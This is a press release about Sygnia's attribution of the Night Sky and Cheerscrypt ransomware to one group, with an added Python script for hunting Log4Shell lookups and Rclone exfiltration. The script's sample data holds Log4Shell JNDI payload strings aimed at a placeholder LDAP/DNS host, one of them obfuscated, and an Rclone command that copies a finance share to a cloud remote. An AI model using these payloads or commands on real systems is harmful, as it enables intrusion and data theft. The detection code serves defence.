In a new report, Sygnia’s Incident Response (IR) team connects Night Sky and Cheerscrypt activity to one unified threat group targeting Windows and VMware ESXi environments.
Sygnia, a leading incident response and cyber security consulting company that protects organizations worldwide, today released a new report uncovering that attacks led by the Night Sky and Cheerscrypt ransomware groups originated from the same threat actor, dubbed ‘Emperor Dragonfly’ by the company. This significant discovery reaffirms a newer methodology among threat actors: presenting themselves as several smaller groups in order to avoid discovery and attribution.
While investigating an incident involving the largely unknown ransomware group Cheerscrypt, Sygnia’s IR team detected that the Tactics, Techniques and Procedures (TTPs) in use strongly resembled those of another known ransomware group, Night Sky. The fact that Night Sky indicators of compromise (IOCs) were identified, yet Cheerscrypt ransomware was deployed, prompted Sygnia’s IR team to delve deeper into Cheerscrypt’s origins. As a result, Sygnia has become the first to identify that Cheerscrypt, like Night Sky, is another ransomware family developed by Emperor Dragonfly.
In January 2022, the threat actors compromised a VMware Horizon server by leveraging the Log4Shell vulnerability. From there, they increased their foothold within the network and moved laterally by executing code remotely and deploying Cobalt Strike Beacons. After a dwell time of several months, the threat actors used the Rclone open-source command-line tool to exfiltrate sensitive information to a cloud storage service, then delivered the final payload: Cheerscrypt ransomware. Although most publications describe Cheerscrypt as a Linux-based ransomware family that targets ESXi servers, in the case Sygnia investigated both Windows and ESXi machines were encrypted.
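The chain described above gives defenders two concrete places to look: the Log4Shell lookup strings that reach the Horizon server’s web tier, and the Rclone transfer commands that precede the ransomware. The following Python is an added example, not code from Sygnia’s report; it scans constructed web-access lines for Log4Shell-style JNDI lookups and constructed process-creation events for Rclone transfers. The log format, hostnames, user names, paths and the `mega:` remote are assumed sample values.

```python
"""Hunt for two stages of the chain above in constructed logs:
Log4Shell-style JNDI lookups in web access logs and Rclone transfer
commands in process-creation events."""
import re

# Constructed sample data (not taken from the incident report).
WEB_ACCESS_LOGS = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2022:10:02:17 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [12/Jan/2022:10:02:40 +0000] "GET /portal/?x=${${lower:j}ndi:dns://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

PROCESS_EVENTS = [
    {"host": "fs01", "user": "svc_backup",
     "image": r"C:\Program Files\Veeam\Backup\Veeam.Backup.Manager.exe",
     "cmdline": "Veeam.Backup.Manager.exe"},
    {"host": "fs01", "user": "admin",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": 'rclone.exe copy "D:\\Shares\\Finance" mega:backup --transfers 16'},
    {"host": "ws07", "user": "jdoe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe rclone-notes.txt"},
]

# Plain JNDI lookup, case-insensitive, tolerant of whitespace around the colon.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup is rare in legitimate traffic and is
# the usual way the plain string is disguised; flag it as a weaker signal.
NESTED_LOOKUP_RE = re.compile(r"\$\{[^{}]*\$\{")


def find_jndi_lookups(lines):
    """Return (signal, line) pairs for lines carrying a suspicious lookup."""
    hits = []
    for line in lines:
        if JNDI_RE.search(line):
            hits.append(("jndi_lookup", line))
        elif NESTED_LOOKUP_RE.search(line):
            hits.append(("nested_lookup", line))
    return hits


# Rclone subcommands that move data to a remote; 'ls'-style commands are ignored.
RCLONE_TRANSFER_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto"}
REMOTE_ARG_RE = re.compile(r"^([A-Za-z0-9_-]+):")   # e.g. "mega:backup"
WINDOWS_DRIVE_RE = re.compile(r"^[A-Za-z]:\\")       # e.g. "D:\Shares", not a remote


def find_rclone_transfers(events):
    """Return a summary dict for every process event that runs an Rclone transfer."""
    hits = []
    for ev in events:
        argv = ev["cmdline"].split()
        if not argv:
            continue
        binary = argv[0].lower()
        is_rclone = (ev["image"].lower().endswith("rclone.exe")
                     or binary in ("rclone", "rclone.exe"))
        if not is_rclone or len(argv) < 2:
            continue
        subcommand = argv[1].lower()
        if subcommand not in RCLONE_TRANSFER_SUBCOMMANDS:
            continue
        # The remote is the first "name:" argument that is not a local drive path.
        remote = None
        for arg in argv[2:]:
            m = REMOTE_ARG_RE.match(arg)
            if m and not WINDOWS_DRIVE_RE.match(arg):
                remote = m.group(1)
                break
        hits.append({"host": ev["host"], "user": ev["user"],
                     "subcommand": subcommand, "remote": remote})
    return hits


if __name__ == "__main__":
    for signal, line in find_jndi_lookups(WEB_ACCESS_LOGS):
        print(f"[{signal}] {line}")
    for hit in find_rclone_transfers(PROCESS_EVENTS):
        print(f"[rclone_transfer] {hit}")
```

The nested-lookup heuristic deliberately stays generic: it does not try to enumerate evasion variants, only to surface any request whose lookup syntax is more complex than it should be. Rclone is legitimately used for backups, so the process-event check is meant to be joined against an allow-list of expected hosts, users and remotes rather than alerted on directly.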
Unlike other ransomware groups, Emperor Dragonfly, also known as DEV-0401/BRONZE STARLIGHT, does not operate in an affiliate model and refrains from purchasing initial access from other threat actors. Rather, the group manages all stages of the attack lifecycle on its own. The group also rebrands its ransomware payloads every few months, which helps it stay under the radar, unlike other notorious groups which work to build up a reputation. And despite Cheerscrypt’s operators presenting themselves as pro-Ukrainian, during the incident the threat actors deployed open-source tools that were written by Chinese developers for Chinese users, reinforcing previous claims that the Emperor Dragonfly operators are based in China.
“In the world of ransomware affiliates and leaked ransomware source code, it is often difficult to connect two ransomware strains with one threat actor,” said Amnon Kushnir, Incident Response and Threat Hunting Team Leader at Sygnia. “This discovery is crucial in helping our clients to better search their networks for traces of the threat group in a rapidly-changing landscape, as well as better defend their systems against Emperor Dragonfly and similar threats.”